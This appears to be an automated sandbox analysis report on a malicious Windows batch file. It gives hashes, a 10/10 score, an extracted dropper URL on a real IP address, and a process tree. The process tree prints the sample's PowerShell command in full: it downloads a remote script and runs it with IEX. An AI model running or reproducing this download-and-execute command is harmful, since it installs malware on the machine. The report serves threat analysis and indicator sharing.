Analysis
-
max time kernel
111s -
max time network
135s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
399c49693a18efe92bd488070ce05958.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
399c49693a18efe92bd488070ce05958.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
399c49693a18efe92bd488070ce05958.bat
-
Size
219B
-
MD5
9f6f9d198ba17e88e3aaeab145105bbd
-
SHA1
24970fd1d68dd8c11b435442a710939a1d25def5
-
SHA256
e929eaff3a0856e72e5085f1829ec9794c8f729a198e10ff6376bd423bf6b593
-
SHA512
55359357d68d59d6dd7412600bb3ce137de55bc4dbd2569c2fc8082b9e070e20f74e90533caa09c455a8d97403600203abac9612c6f5aee39dfe8007062491bf
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/399c49693a18efe92bd488070ce05958
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3700 3196 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3700 WerFault.exe Token: SeBackupPrivilege 3700 WerFault.exe Token: SeDebugPrivilege 3700 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe 3700 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\399c49693a18efe92bd488070ce05958.bat"1⤵PID:2688
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/399c49693a18efe92bd488070ce05958');Invoke-ESZSYMZBHPFU;Start-Sleep -s 10000"2⤵PID:3196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3700